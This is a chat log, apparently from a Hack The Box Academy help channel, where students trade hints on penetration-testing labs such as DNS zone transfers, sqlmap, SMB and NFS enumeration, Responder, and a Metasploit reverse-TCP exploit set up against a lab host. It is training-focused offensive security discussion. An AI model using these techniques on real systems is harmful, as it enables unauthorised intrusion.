OK DNS is always the bane of my existence. I have tried dig commands for ANY, AXFR, TXT on all these subdomains. I have not seen any flags. Am I just being impatient since the subbrute isn't finished? or are there any other digs I can use. here is an example dig command, below that is my subbrute:

||dig axfr hr.inlanefreight.htb 10.129.125.41||

||./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
inlanefreight.htb
hr.inlanefreight.htb
helpdesk.inlanefreight.htb
ns.inlanefreight.htb
control.inlanefreight.htb||

fiery wasp
#

Hello Iโ€™m using HTB academy free subscription and Iโ€™m currently studying the Linux module and I canโ€™t unlock any module even though I had enough cubes . Can anyone tell me why it occurs?

next bronze
acoustic owl
fading matrix
#

Can someone help me with these two questions am stuck

  1. open the "Search & Reporting" application, and find through an SPL search against all 4624 events the count of distinct computers accessed by the account name SYSTEM.
  2. SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes
vale anvil
#

hi guys can i have any advances course on hacking?

#

please help i am new.

acoustic owl
ashen umbra
fiery wasp
fiery wasp
#

Ok Iโ€™ll try this

fiery wasp
crimson eagle
#

Hi all, currently in Windows Event Logs & Finding Evil Module for SOC analyst role.
I've modified and saved the file on host machine but I'm not sure how to transfer that into the RDP machine.

#

Do I need to config and save the xml file in the RDP machine instead?

grand zinc
#

i have also tried to read in the module but cant find anything that might help

acoustic owl
#

Which module and which section?

crimson eagle
fading matrix
#

I have tried
EventCode=4624 Account_Name=SYSTEM
| stats dc(Computer) as Distinct_Computers

ashen umbra
acoustic owl
shrewd hazel
#

can someone explain this special marker to me a bit more for sqlmap?

#

so basically if you just know the uid you can use this special marker to guess or run through other stuff?

#

of course the image wont load lol

#

the * part

next bronze
#

that's just to tell sqlmap where to inject

harsh wren
#

can anyone help me with pivoting skill assessment , i got the credentials and private key , every time i ssh the server i got wrong password

shrewd hazel
next bronze
#

inject the sql injection queries

shrewd hazel
#

ahh gotcha, thank you

next bronze
#

it will parse and try to find the injection point on its own, but if you're sure where it is, specifying would make it a lot faster

shrewd hazel
#

i tried running without the special marker but it didnt work at all

limpid hemlock
#

Hey anyone

#

I got password attacks lab hard the back.vhd file onto pwn box now trying to Crack it

#

Getting error while extracting daya message

grand zinc
#

Im doing the filter contents module and i cant remember where they explained cURL in linux fundamentals. i googled and got a small understanding but what does each part of this command i found on the forums do?

cloud urchin
fathom pendant
limpid hemlock
#

Ah I did it but it's shows

#

Error while extracting data no signature found

fathom pendant
#

Then maybe the file got corrupted while transferring

limpid hemlock
#

I was does it take a lot of time to transfer

fathom pendant
#

It shouldn't considering what's actually on it

limpid hemlock
#

Mm

#

I don't knw here it's taking some time

fathom pendant
#

A couple minutes at most

#

Xfreerdp has the /drive: option to mount for easier transfer

limpid hemlock
#

I'm using that

#

Itself still

#

Taking 10 minutes plus

fathom pendant
#

Sounds like your connection might be shaky

#

Do a checksum on it: md5sum in linux and Get-Filehash in powershell

limpid hemlock
#

Mm

sleek moss
#

SQLMap Essentials

Page 6
Attack Tuning

Attack Tuning

#

case 5

dim wolf
sleek moss
#

what is best then

#

3 and 3?

dim wolf
#

๐Ÿคทโ€โ™‚๏ธ

#

the point of the exercise is for you to tune it yourself

sleek moss
#

why doesnt sqlmap case 5 flag work for me?

steady dust
sleek moss
#

its the flag?

steady dust
tepid flame
#

Hey, I'm working on File Upload Attacks - Limited File Uploads so I managed to exploit the Xss but when I try to read any content like index.php , upload.php using the XXE payload it didn't work! I have tried to change the directory as mention on the Section but still no luck any hint?

fathom pendant
#

I'd delete that, as it still can be an answer

steady dust
#

Command Injections - Skills Assessment. I've teste && and ||, but they are considered malicious.

sleek moss
#

are they same flag u get?

fathom pendant
#

Even if not: it's a flag format so be careful

grim current
#

I'm working on DIRECTORY ENUMERATION & ATTACKS module atm. I understand that I need to sniff the ens224 interface from on the Parrot OS but this interface doesn't exist. Do I miss something here ?

cloud urchin
#

type 'ip a' and see what your adapter is called

steady dust
grim current
#

Only eth0 and tun0

cloud urchin
#

so which one do you think your vpn adapter is?

grim current
#

tun0

cloud urchin
#

right

steady dust
grim current
#

yES

fathom pendant
steady dust
fathom pendant
#

ensX is used on the target machines

steady dust
#

Basically, your target machine it's like a proxy between you and AD environment. ๐Ÿ™‚

#

So, do you have any idea why on the Command Injections - Skills Assessment all operators are considered malicious?

cloud urchin
#

yes, you need to obfuscate the commands

steady dust
#

even the operators? ๐Ÿ˜„

#

i mean &&, ||...

cloud urchin
#

they may be, yes

#

i don't recall those ones specifically but i remember - being flagged

#

remember to enumerate what exactly is triggering the block

steady dust
#

i tested them individually, without anything else

grim current
steady dust
grim current
#

Is the target box is the box that provided running on Parrot OS ?

steady dust
#

no

#

or maybe yes

#

what module are you doing?

grim current
#

Active Directory Enumeration & Attacks

steady dust
#

yes, but there are multiple lessons

#

which one?

grim current
#

Initial Enumeration of the Domain

fathom pendant
#

Spawn instance and spawn target are completely different

#

Spawn Instance spawns an instance of the Pwnbox attack box
Spawn target spawns a box (generally) on the 10.129.x.x network for you to attack (which may or may not be networked)

#

the only way to interact with targets is usually via either ssh or rdp with given creds

grim current
#

So the intruction clearly said snif eth0, ARP packets make us aware of the hosts: 172.16.5.5, 172.16.5.25 172.16.5.50, 172.16.5.100, and 172.16.5.125.

fathom pendant
#

though sometimes it's via protocols like winRM/SMB/FTP

fathom pendant
#

if your system doesn't have the 172.16.5.x connection: then you won't see this traffic

grim current
#

I did but eth0 is external IP. No ARP here

fathom pendant
#

listen to me carefully

#

VERY carefully

#

look JUST above the questions

#

do you see a 10.129.x.x IP OR Green text that says "Click Here To Spawn Target!"

#

this ^

#

in order to perform the excersize you must first connect to the target system

rare robin
#

can someone help me im in paylaods and shells module one the live engagement and when i exploit i get an error saying : no method error undefined method "get_cookies"

fathom pendant
rare robin
#

i have

#

im thinking its the rhost because i use kali and i just do tun0

fathom pendant
#

oh

#

you need to use the provided jump host

#

and the Lhost will be different for the exploits as well

grim current
#

Thanks found it.

#

So confusing they add this instruction at the bottom of the page.

rare robin
fathom pendant
fathom pendant
#

jump host simply refers to a median host that's used to connect to other devices on a network

rare robin
#

oh im supposed to put in the lhost

#

or rhost

fathom pendant
#

Does the device your using have the same interface as any of the 3 targets?

#

no, because they are on a separate network

#

:P

#

you need to first rdp to the 10.129.x.x target; then carry out the attacks on the hosts

rare robin
#

yea im on the rdp

fathom pendant
#

(firefox is installed on that target)

#

the lhost needs to be on the same network as the target(s)

rare robin
#

[-] Exploit failed: NoMethodError undefined method `get_cookies' for nil:NilClass
[*] Exploit completed, but no session was created.

fathom pendant
#

sometimes it's dumb.

astral inlet
#

spwaning problems known ?

rare robin
#

worked

#

idk wht i changed lol thx

fathom pendant
astral inlet
#

lol now it spawned

wicked mulch
#

Hello everyone. Im doing the getting started modulo and I got to section Nibbles - Privilege Escalation to the part I have to download LinEnum.sh script but When I try to access the link into my pwnbox it doesnt display. Any ideas on how to download the script into my pwnbox?

heavy edge
#

git clone or wget

#

try and git clone the .sh file i cant remember the exact url from gh

wicked mulch
cloud urchin
#

are you sure the tool isn't provided in any directory?

heavy edge
#

wait yeah linenum should come with regardless no?

wicked mulch
thorn urchin
wicked mulch
#

Thank you all

sleek moss
mellow delta
#

I have gone back to the smb section of the learning path, because that's where I think I should be focusing, but would love some guidance

upbeat oak
#

can anyone help me with the install of the odat.py file I'm getting an externally-managed-environment error

#

never mind apparently its the repository and you can just regulary install it

fringe urchin
#

and worked fine

upbeat oak
mellow delta
#

I am so stuck

fringe urchin
mellow delta
#

This medium level footprinting lab is so tough for me lol

fringe urchin
mellow delta
#

lol, I don't really know where to begin. I have run nmap against the ip. I have tried enum4linux. I believe the vulnerability is withing smb or rdp but I am just having a world of trouble gettting anywhere

#

i ran nmap with the flag --vuln scripts. got a cve back but didn't get anywhere with it

fringe urchin
#

had to pull out my writeup
No CVEs needed

fathom pendant
#

^

fringe urchin
#

yea smb and rdp are running and something else

fathom pendant
#

there's no need for exploits

#

it's just basic enumeration tactics

fringe urchin
#

i personally didnt go the smb route, i think Marcie went since i think i quicky searched for it after i was done with it

#

yea Basic enumeration that was written in the Modules

fathom pendant
#

that's all that the footprinting module taught you, so that's all you should go with

fathom pendant
#

still need to enumerate the creds from one of the running services

mellow delta
#

I have been trying to crack into smb but i can't figure how, I think that's where i went to enum4linux

fringe urchin
fathom pendant
mellow delta
#

I think the problem i hit was when i enumerated I couldn't find any shares to connect to

fathom pendant
#

and in order to run enum4linux you'd need to be connected to the target

#

:P otherwise running it locally runs it on your own system

#

which is about as useful as a chocolate teapot

mellow delta
#

makes good hot chocolate

fathom pendant
#

not the point

mellow delta
#

any hints on where I should go back to look at?

fathom pendant
#

scan all the ports

fringe urchin
#

what services have you found?

fathom pendant
#

there's a service you're missing that's not SMB or RDP

fringe urchin
#

except rdp and smb

mellow delta
#

msrpc?

fringe urchin
#

msrcp thats 135 port?

fathom pendant
#

also to enumerate SMB shares you can just do smbclient.py -L -N //ip/

fathom pendant
mellow delta
fathom pendant
#

as msrpc is usually tied with SMB

fringe urchin
mellow delta
#

and we don't obviously initially have the creds, so it's something else hmm

#

nfs?

fringe urchin
#

its worth checking it out

fathom pendant
#

if you haven't checked it out; i'd highly recommend it

fringe urchin
#

shruge maybe something will come out of it! and if you are stuck there because of a permission, reread the module, somwhere its being explained

mellow delta
#

thanks guys, you are both really helpful in a not just giving the answer way. It's really appreciated

fathom pendant
#

as i will constantly remind anyone that gets stuck like this:

#

step 0: enumerate

#

Always double check that you enumerated all the services you can

fringe urchin
#

and all the ports. even udp ones.... Pepereally

#

(not connected to medium lab)

fathom pendant
#

create a checklist of services that have the potential to be logged into anonymously
if they're exposed - are they anonymous login? no? check other ports

fathom pendant
mellow delta
#

there is an nmap scan that comes back with anonymous login in allowed or not usually, I didn't see that this time so I must not have done it properyl

fathom pendant
#

well sometimes the scripts are unreliable

#

don't rely on automation when the manual method can easily confirm or deny ยฏ_(ใƒ„)_/ยฏ

fringe urchin
fathom pendant
#

and imo it can be easily guessed (but that's just from having already completed it)

mellow delta
#

this is a very hard skill to learn

fathom pendant
fathom pendant
#

to get you in the habit of doing it

#

never assume the question is the first step in the journey

#

a good example of the above point is the password attacks - mutated password section: you're told to get a user's creds and ssh in; but bruteforcing ssh is like pulling teeth

#

so you have to enumerate for other exposed services

fringe urchin
fathom pendant
lethal latch
#

I'm stuck on the advanced xss filter bypass section, I'm able to bypass the filter but I'm not seeing any interaction past that. I can reference the exploit server as the script source and it works fine, but the payload for capturing admin interaction isnt giving me anything

fringe urchin
mellow delta
#

i have managed to mount the nfs and read it. So far I have just found a bunch of empty ticket files

fathom pendant
fringe urchin
mellow delta
#

when you say list them, you mean to iterate through and cat their contents?

fathom pendant
#

nope

fringe urchin
#

nah there is a command

#

that shows how big files are

fathom pendant
#

you can do just ls -la for the quick way

fringe urchin
#

a very used one

#

yea this one sadglas

fathom pendant
#

or you can just do a find command with some flags to specify the size

#

i think like +0 will show any above zero

fringe urchin
#

i use -la everytwhere since it shows hidden / . files aswell

fathom pendant
#

and it's like "why is it empty... oh wait"

fringe urchin
#

ooh Celia??

mellow delta
#

thanks, slowly progressing

fathom pendant
#

fun fact: that skill assessment used to not have that user's creds given to you, you had to check the hints for it

mellow delta
#

yes, that's an interesting ticked for sure

fathom pendant
#

or had to creatively bruteforce

fringe urchin
fringe urchin
fringe urchin
fringe urchin
#

kekw i try to avoid any hints/ resources there untill i feel like im really stuck

dim wolf
#

aren't most resources necessary to complete the module

fringe urchin
#

well i didnt know untill that specific footprining exercise that resources exist

dim wolf
#

it do be like that sometimes

mellow delta
#

sorry guys I need help again, ive been able to connect with smb and found a file with what i think is an admin user, but I am struggling to jump in knowledge to where to use this

mellow delta
#

i gained a username and pasword. logged in via smb. found a file with a username and creds, but don't know where to apply that

next bronze
#

try logging in with that and see what you can access

mellow delta
#

that's my problem, not sure where to log in. tried logging into smb with those creds, failed

#

I feel like it's an admin password and user I found since the username was just two letters

next bronze
#

check the hint, try it with sql

mellow delta
next bronze
#

other than smb, how else can you login to acces the sql stuido gui?

crystal steeple
#

you should know the syntax since it was covered in SQL section

mellow delta
#

let me go back to the sql section and see then

#

thanks

mellow delta
#

I keep getting a connection refused error

next bronze
#

could be wrong tho, it's been a while

mellow delta
#

I made some progress today lol. This module is taking me an eternity

mellow delta
#

looking now

crystal steeple
#

with new creds

mellow delta
#

doesn't like the creds i found in the text file, or I am just hitting a wall

crystal steeple
#

ok tell me

#

you have the ||sa|| creds?

normal panther
#

Hi guys, need a little hint on the module of Getting Started after Nibbles box there's a Knowledge Check section I have submitted both user and root flags through manual method but I also wanted to do the msf one as well just to build the understanding but I'm getting error while exploiting. I am pretty sure that it has something to do with setting the "TargetURI". I have set it to /admin so that it can authenticate with valid creds as its an authenticated vuln however I have also tested /theme/Innovation/template.php as the vuln is related to php code injection. Still Getting the error of

[] Started reverse TCP handler on 10.10.14.88:7777
[
] 10.129.237.195:80 - Authenticating...
[-] 10.129.237.195:80 - Exploit aborted due to failure: no-access: 10.129.237.195:80 - Authentication failed
[*] Exploit completed, but no session was created.

#

msf6 exploit(unix/webapp/get_simple_cms_upload_exec) > show options

Module options (exploit/unix/webapp/get_simple_cms_upload_exec):

Name Current Setting Required Description


PASSWORD admin yes The right password for the provided username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.129.237.195 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /admin yes The full URI path to GetSimplecms
USERNAME admin yes The username that will be used for authentication process
VHOST no HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description


LHOST 10.10.14.88 yes The listen address (an interface may be specified)
LPORT 7777 yes The listen port

Exploit target:

Id Name


0 Generic (PHP Payload)

View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/get_simple_cms_upload_exec) > exploit

^ THIS IS WHAT I HAVE DONE

novel hinge
#

10.129.237.195/admin

try that

normal panther
#

yeah I tried that same error

#

I'm thinking I have done something wrong on TargetURI because other options seems obvious enough I believe

novel hinge
#

i just finisheed getting started last week, and havee been moving along. you will have a lot of time using msf during the course. dont sweat it if you cannt figure it out.

limpid hemlock
#

Ah hlo

#

Anyone knw how to see the bit locker encrypted drive on the password attacks hard lab I rdp'd into that and can't see anything

rustic sage
#

try to crack it

#

they show you how to do it in the module

jolly jackal
#

hey guys which one should i chosse red team or the blue team

#

i choose the red team

sleek moss
#

SQLMap Essentials

Page 10
OS Exploitation

OS Exploitation why cant i acces the website?

green smelt
#

INTRODUCTION TO DIGITAL FORENSICS-Rapid Triage Examination & Analysis Tools

could anyone help me this question :

i did not understand the flow yet

fringe urchin
#

I manually clicked on every user and put the password in via the alex machine. After i got a hit i used rdp

cloud urchin
#

I can't seem to search for accounts in GPO's in the Searching for Accounts in Group Policy Objects section of the CME module. Getting Netbios errors connecting when I use the commands, both on my kali machine and the pwnbox. I can't move forward with the module.. am I missing something here or is the VM just crapping itself?

graceful mortar
#

they way is in the lesson

fathom pendant
#

though UAC doesn't like copy/paste

fathom pendant
fringe urchin
#

๐Ÿ’€

cloud urchin
#

one of the commands worked after 45 tries

misty saddle
#

I'm doing the Web Server Pivoting with Rpivot.
When I'm trying to backconnect from client to attack host it won't establish a connection. Anyone had the same issues or can see if something is wrong in my syntax?

autumn pilot
#

The IP you've specified doesn't seem to be from tun0 exactly

misty saddle
#

It is my tun0 address

cloud urchin
#

maybe use sudo?

misty saddle
misty saddle
autumn pilot
#

10.10.4.46 != 10.10.14.46

cloud urchin
#

0.0.0.0 just makes it listen on all

misty saddle
cloud urchin
#

oh i see lol he targeted the wrong ip

misty saddle
#

I think I need glasses

#

Or just increase the zoom by 300%

green smelt
fathom pendant
#

likely with the tool that you've been shown how to use

#

ยฏ_(ใƒ„)_/ยฏ

left egret
#

Hello, for "AD Enumeration & Attacks - Skills Assessment Part II", I have no response by responder, what is wrong ? "SSH htb-student@<target>" then "sudo responder -I ens224 -A", but no answers. Can yoy help me please ?

soft cedar
soft cedar
left egret
#

no change. Perhaps I must adjust poisonning options ?

[+] Poisoning Options:
Analyze Mode [ON]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]

soft cedar
glass stone
#

Good day guys I need a hint or help in Python Library Hijacking in Linux Privesc in HTB academy

#

If someone in avilable Id be glad

left egret
crystal steeple
#

A little longer

#

And also use -v to view the hashes since when you gotta wait it will say display โ€œskipping previously captured hadhes โ€œ even you didnโ€™t capture any

left egret
#

no hashes with -v

soft cedar
crystal steeple
#

Just wait man give it time 10min

soft cedar
crystal steeple
#

Maybe not 10 but 5-10

soft cedar
#

ouch

crystal steeple
crystal steeple
past compass
#

Looking for someone who's completed the skills assessment lab for Pivoting, Tunneling, and Port Forwarding. I did it but was wondering how the rest of you managed to do it.

left egret
#

I'll try also without -A, thx

slate halo
#

Hello, im doing the footprinting lab - medium. I got access to smbclient and found the file but when I download after that !cat is not working and I cannot read the content.

acoustic owl
#

Does the file have any content? How large is the file on the server?

proud sequoia
#

Having issues on the password attacks module, no pwns returning when using crackmapexec for winrm question

#

Using lists from the resources

#

Anyone done this?

slate halo
#

after using get -

#

wait a sec

#

im so stupid it has content it just so short I didnt even notice it

left egret
past compass
haughty void
#

Module: PASSWORD ATTACKS
section: Password Attacks Lab - Easy

I have successfully logged into ssh but can't elevate privileges to root, I also tried bruteforcing but that didn't do anything

proud sequoia
#

How did you get the winrm question?

haughty void
proud sequoia
#

Yep, it runs through the username list but doesnโ€™t return any owns

#

Using the user.list and password.list provided

simple socket
#

Hello everybody, I am currently on the hackthebox academy and I am deconnected all the time when I am connected to the RDP. I tried to change / restard my file openvpn

#

I got this error

#

someone already got this error ?

#

thanks

crystal steeple
#

That was covered in the section

#

In creds hunting in linux

#

Im sure you missed something so dumb that will lead you to root password :3

simple socket
#

Someone now if for the VPN problem a room exist ? Thanks

ruby umbra
#

Hope you are doing well. I need guidance in Starting Point Tier 1 Three Machine. from where I can get that?

next bronze
fathom pendant
#

After connecting to the vpn, can you ping google.com?

simple socket
#

yes

#

ping 8.8.8.7

#

8.8.8.8

fathom pendant
simple socket
#

yes

#

it's working also

fathom pendant
#

Ok.

#

I'd say restart your vm, and try again

simple socket
#

Ok

fathom pendant
#

If issues persist, reach out to website support via the green bubble

#

If you don't see a green bubble on the academy page, disable adblock

haughty void
simple socket
#

thanks

crystal steeple
#

And lemme know what you found there

haughty void
crystal steeple
silver ember
#

can someone help me with crackmapexec - skill assessment?

upbeat oak
#

I'm still stuck footprinting oracle tns. odat was in the repository so I just apt installed it but sqlplus is not and I'm pretty sure I need that to complete this one

fathom pendant
split pelican
#

Anyone Have Fake Virus Script

upbeat oak
fathom pendant
split pelican
fathom pendant
split pelican
#

Bruh Rule 1

fathom pendant
#

Even still: scaring your friend with a fake virus is a dick move

split pelican
#

๐Ÿ’€

sly grotto
#

I need help for

ABUSING HTTP MISCONFIGURATIONS  
Common Session Variables (Account Takeover)

bypassing the MFA
any help please?